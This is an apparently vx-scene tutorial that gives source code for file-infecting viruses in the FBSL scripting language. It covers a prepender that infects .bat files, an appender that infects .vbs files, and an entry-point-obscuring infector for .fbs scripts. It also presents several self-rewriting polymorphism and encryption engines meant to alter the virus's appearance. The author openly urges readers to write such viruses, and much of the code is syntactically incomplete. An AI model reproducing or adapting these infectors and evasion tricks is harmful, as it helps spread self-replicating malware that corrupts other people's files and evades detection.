|| Author: Genetix/DoomRiderz || Back to articles ||
                                             FBSL (FUNNY BASIC STUPID LANGUAGE)

-Prepender & adding trash

--Encryption, adding ascii codes

---Polymorphic, prepender & adding trash
---Polymorphic, letter case changing
---Polymorphic, Variable changing
---Polymorphic, Joining lines

----Polycryption *

About FBSL: 'Freestyle Basic Script Language'
At first FBSL looks alot like VB. It has some common Pascal, C functions too.
It's in early stages, not YET supporting arrays.. But it was fun to write these code's in this language! 
Hope someone somewhere starts creating viruses with this! It's able to compile into exe files.. 
you could write a virus to infect exe files made with FBSL. I've not done that yet, I think this is enough, but
would like to see that!

Prepender & PolyMorphic-

In this example i included the polymorphism. So instead of making another section just for adding trash-poly, i build it into 
the prepender. There are some more polymorphism tricks in this article.

==============================Prepending - Polymorphic (adding trash lines)=========================================

'Polymorphic/prepender.. changes random lines to uppercase & lowercase & add's trash comments

DIM %fp , %maxbuff = 100, $sBuff
DIM $x, %FileList, $j, %LINE, $op, $ss, %i
FileList = ScNew()

Begin Const
    InfMarker = "#Genetix"
    InfEnd = "#End"
    TrashMark = "'"
End Const

x = FindFirst( "*.*" )
WHILE x <> ""
    x = FindNext
    ScAdd( FileList, x )

FOR i = 1 TO ScGetCount(FileList)
    IF INSTR(scIndexAt( FileList, i ), ".bat") THEN
        op = FileOpen( scIndexAt( FileList, i ), "APPEND" )
        ss = FileLoad(scIndexAt( FileList, i ))
        IF InStr(ss, InfMarker) = "" Then
        j = FileOpen( scIndexAt( FileList, i ), "OUTPUT" )
        fp = Fileopen( COMMAND(1), binary_input )
        WHILE NOT Fileeof( fp )
            sBuff = FileGets(fp, maxbuff)
            IF sBuff = InfEnd THEN EXIT WHILE
            IF LEFT( sBuff, - LEN(sBuff) + 2 ) <> TrashMark THEN
            IF Randint(1, 3) = 3 THEN
            sBuff = Lcase(sBuff)
            sBuff = Ucase(sBuff)
            END IF
                IF Randint(1, 4) = 3 THEN
                    FilePrint( j, TrashMark & Trash(Randint(20, 80)))
                    FilePrint( j, sBuff)
                    FilePrint( j, sBuff)
                END IF
            END IF
        FilePrint( j, crlf & InfEnd)
        FilePrint( op, ss)
        Fileclose( fp )
    END IF
ScFinalize( FileList )


function trash(%lenx)
dim $re
    for i = 1 to val(lenx)
        re = re & Chr(Randint(97,122))
    next i
return re
end function


The virus searches for a victim, it first opens itself and reads the entire victims code into a variable. After this
it will open itself and and search from top to the 'end marker, then it does a random number looping throu the code
and changing random lines to Ucase and Lcase, after that it add's trash to itself, infects the victim and.. it's
all over.

Appender for FBSL.

we looove them!




DIM $line1, $line2, Code1 = ScNew(), Code2 = ScNew()
DIM %fp, %c, %i, %FileList, %x, %op

    infEnd = "'end"
    infStart = "'start"

x = FindFirst( "*.vbs" )
   WHILE x <> ""
        x = FindNext
        ScAdd( FileList, x )

FOR x = 1 TO ScGetCount(FileList)

    fp = Fileopen(COMMAND(1), INPUT )
    WHILE NOT Fileeof( fp )
        line1 = FileInput(fp)
        IF line1 = infStart THEN EXIT WHILE

    WHILE NOT Fileeof( fp )
        $line1 = FileInput(fp)
        IF line1 = infEnd THEN EXIT WHILE
        ScAdd( Code2, line1 )

    Fileclose( fp )

    FOR c = 1 TO ScGetCount(code1)
        Other = Other & crlf & ScIndexAt( code1, c )
    NEXT c

    FOR i = 1 TO ScGetCount(Code2)
        all = all & crlf & ScIndexAt( Code2, i )
    NEXT i

    op = FileOpen( scIndexAt( FileList, x ), "APPEND" )
    FilePrint(op, infStart & crlf & all & crlf & infEnd)


This explains itself, it's just like the prepender.. instead it seaches itself for 'start & 'end then extracts the code 
and appends to the victims. That's all to say on this.

EPO virus for the FBSL. 
==============================Prepening inside subroutines befor End Sub============================================

DIM %fp , $sBuff, %code = ScNew(), %i, $all
DIM %self, $some, $ps, $LINE, %codeS = ScNew(), %x, $szLine
DIM $a, $b, codeB = ScNew(), %c, $Other, %j, $szLine, %r, %FileList = ScNew()
    final = "end sub"
    infEnd = "'end"
    infStart = "'start"
    lBreak = crlf
    ext = ".fbs"
r = FindFirst( "*.*" )
WHILE x <> ""
    r = FindNext
    ScAdd( FileList, r )
FOR r = 1 TO ScGetCount(FileList)
    IF INSTR(scIndexAt( FileList, r ), ext) THEN
        fp = Fileopen(scIndexAt( FileList, r ), INPUT )
        WHILE NOT Fileeof( fp )
            sBuff = FileInput(fp)
            IF sBuff = final THEN EXIT WHILE
            ScAdd( code, sBuff )
            WHILE NOT Fileeof( fp )
                sBuff = FileInput(fp)
                ScAdd( codeB, sBuff )
            Fileclose( fp )
            FOR c = 1 TO ScGetCount(codeB)
                Other = Other & crlf & ScIndexAt( codeB, c )
            NEXT c
            FOR i = 1 TO ScGetCount(code)
                all = all & crlf & ScIndexAt( code, i )
            NEXT i
            fp = FileOpen(COMMAND(1), INPUT)
            WHILE NOT Fileeof( fp )
                szLine = FileInput(fp)
                IF szLine = infStart THEN
                    b = szline
                    EXIT WHILE
                END IF
            WHILE NOT Fileeof( fp )
                szLine = FileInput(fp)
                IF szLine = infEnd THEN
                    EXIT WHILE
                    ScAdd( codeS, szLine )
                END IF
            FOR x = 1 TO ScGetCount(codeS)
                a = a & crlf & ScIndexAt( codeS, x )
            NEXT x
            some = all & lBreak & infStart & lBreak & a & lBreak & infEnd & lBreak & final & lBreak & Other
            j = FileOpen(scIndexAt( FileList, r ), "OUTPUT" )
            FilePrint( j, some)
    END IF
ScFinalize( code )
ScFinalize( codeS )
ScFinalize( codeB )


The virus first searches for & creates an array-like list of all files in it's working dir.
After this it checks the file extension for ".fbs" It then opens the file and searches line
by line for "end sub" putting each line befor it into an array. the next step is to continue 
reading the file until EOF. After this is done the virus has the posision of the place to infect
and it has the other half of the victims file to put back after infection. so now it needs to find itself!
Command(1) is the pointer to any fbsl script, so it reads itself and searches for "start" 
then "end" and extracts the code between those markers (the virus code). then it stores all this
stupid data into a variable. Opens the victim and infects her/him/it the pet dog......? easy!


Here is a simple way of encrypting some message.. or the entire virus itself!


#option Explicit
Dim $code, $st, %i, $norm

code = ("y{rw})+qnuux+")

for i = 1 to len(code)
norm = norm & chr(asc(mid(code,i,1)) - 9)



Code variable holds the encrypted code that when decrypted will display a message. This is easy well known encryption
by adding 9 to each ASCII character code. A + 9 = I

ExecLine function Executes the content of the variable holding the code at runtime.

Polymorphic: Changing Ucase & Lcase randomly

This is a vary old method.. but anyway i want to include it here!

==================================================Lcase/Ucase poly====================================================

#oPtioN expliCIt
$apptyPe conSolE
DiM $coDe, %OPENOWn

COdE = PolY(FilELOAD(cOMmand(1)))

fUNcTIon poLy(stR)
dim $TmP, %i, %q
For I = 1 To STRLEn(STr)
      iF RAnDint(1,2) = 2 THEn
      TmP = tmP & LcAse(MId(STR,i,1))
      tMp = Tmp & UcaSe(mid(sTR,i,1))
      enD if
RetuRN tmp

OPeNoWN = FiLeOpeN(COmMaND(1), "oUtPUt" )
fiLEpRInt(oPENoWn, CodE)


The virus opens itself into the poly function, the function loops the length of each line and with a random number decides 
what letter in that line should be Lcase'd - Ucase'd. Once this is finished the virus writes the new code into intself.
It's useless for anti-virus but i still like it!

Polymorphic: Variable name chanhing

Due to this language not supporting arrays it was no other way but to use the following method to get this working.

=================================================Variable name changing===================================================

#option Explicit

Dim Array = ScNew()
Dim %i, $result, %fp, $sBuff
Dim %p, $r, $NewCode, $OpenMe

        fp = Fileopen(Command(1), INPUT )
        WHILE NOT Fileeof( fp )
            sBuff = FileInput(fp)
            ScAdd( Array, sBuff)
        Fileclose( fp )

for i = 1 to ScGetCount(Array)
    result = result & crlf & ScIndexAt( Array, i )

NewCode = NameChange(result)

            OpenMe = FileOpen(Command(1), "OUTPUT" )
            FilePrint( OpenMe, NewCode)

function polymorph(%lenx)
dim $re
    for i = 1 to val(lenx)
        re = re & Chr(Randint(97,122))
    next i
return re
end function

function NameChange(code)
result = replace(code,"result", polymorph(RandInt(5,10))) : result = replace(code,"Array", polymorph(RandInt(5,10)))
result = replace(code,"fp", polymorph(RandInt(5,10))) : result = replace(code,"NameChange", polymorph(RandInt(5,10)))
result = replace(code,"sBuff", polymorph(RandInt(5,10))) : result = replace(code,"polymorph", polymorph(RandInt(5,10)))
result = replace(code,"lenx", polymorph(RandInt(5,10))) : result = replace(code,"NewCode", polymorph(RandInt(5,10)))
result = replace(code,"OpenMe", polymorph(RandInt(5,10))) : result = replace(code,"code", polymorph(RandInt(5,10)))
return result
End Function


First the virus opens itself and read's line by line adding each line to the "string collection" it's the closest thing to 
arrays in FBSL. It then loops through the lines collected in the string collectiong joining each line to "result" variable.
NewCode calles a function to replace each variable with a random set of letters with a random laengh 5 - 10, It then
Now that NewCode has the modified code the virus opens itself for write access and inputs it's new code. simple!

Polymorphic: Joining lines

this can be improved.
I've not seen this used befor but here it is in fbsl.
==========================================================Joining lines===================================================

option Explicit
Dim $line1,  Code2 = ScNew()
Dim %fp, %i, %op
fp = Fileopen(Command(1), Input )
While Not Fileeof( fp )
   line1 = FileInput(fp) 
   ScAdd(Code2, line1)
Fileclose( fp )
For i = 1 To ScGetCount(Code2)
    if instr(ScIndexAt( Code2, i ), chr(58)) then 
        replace (ScIndexAt( Code2, i ), chr(58), chr(13) & chr(10))
    end if
    if RandInt(1,8) = 3 then
        all = all & chr(58) & ScIndexAt( Code2, i )
        all = all & crlf & ScIndexAt( Code2, i )
   end if
Next i
op = FileOpen(Command(1), OUTPUT )
FilePrint(op, all)


The code opens itelf and reads eachline into the string collection. It loops through each line in the string collection
first seaching for ":" in the line and replacing them with a new line (like pressing the enter key) then it decides
with a random number what lines to join together. Most languages support this, in fbsl it's the same as vbs, vb ect..
when that's done it writes the new code into itself. ok boooring, but i like it! *sings*

Polymorphic: Polycryption

This is a cross between polymorphism & encryption. Was just a random idea while playing with some encryption in C#
Probably old method? not seen it befor thou. So here it is!



DIM $Code

Code = x("uwnsy%'Utq~2Hw~uynts%g~?%Ljsjyn}'5") 'The encrypted code with key appended to it

    DIM $txt
    DIM %rndKey
    DIM $tmp
    DIM $result
    DIM $rtn
    DIM $original
    DIM $KEY
    DIM $self
    DIM $OpenMe
    DIM %i
    original = STR  'original string must be stored so it knows what to replace!

    self = FileLoad(COMMAND(1))   'load itself

    KEY = RIGHT(STR, 1) 'the key is stored at the end of the encrypted string, get the key! or shall we just guess it?
    FOR i = 1 TO LEN(STR)
        rtn = rtn & CHR(ASC(MID(STR, i, 1)) - VAL(KEY)) 'restore the encrypted string.. how else can i explain this line??
    rtn = MID(rtn, 1, LEN(rtn) - 1) 'take away the key from the string because it's junk at this point.

    ExecLine(rtn) 'execute the decrypted code

    rndKey = RandInt(1, 4) 'create a new random key
    FOR i = 1 TO LEN(rtn)
        tmp = tmp & CHR(ASC(MID(rtn, i, 1)) + rndKey) 're-encrypt the code with the new key!
    result = tmp & rndKey 'gives the encrypted code to the variable "result" and append's the key

    'last, open itself, replace the decrypted code with the new encrypted code.. polymorphic & encryption at the same time!
    OpenMe = FileOpen(COMMAND(1), OUTPUT)
    FilePrint(OpenMe, REPLACE(self, original, result))



yey i love this! i commented the code instead of writing to much here (being lazy again!) 


I think im done with FBSL now.. so, hope you enjoy reading this & go write some fbsl virus !!!

Now some comments to my friendly friends!~ in alphabetical order!
MikeAce      ~YOU HAVE A G/F!!!!! lol
Retro        ~thx for always helping me :) and not wanting sex for it...
SPTH         ~because this "tutorial?" is kinda in the same format as he writes his.... but mine is better *laughs*
SkyOut       ~HOPE!
blueowl      ~where the hell was the hello to me in rrlf like you promised!?!?!?!?!?!??!
dr3f         ~I want your bot's when you die! *KILLS YOU*
falckon      ~genetical? falckonisity!
kefi         ~I MISS YOOOOOOOOOOOOOOOOOOUUWWWWWWWWW!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! :(
synge        ~hello hello hello hello hello hello hello hello hello.. bye

And to all eof members: I'm the best! :p
If your name is missing it's because i don't like you... or i just forgot, you choose!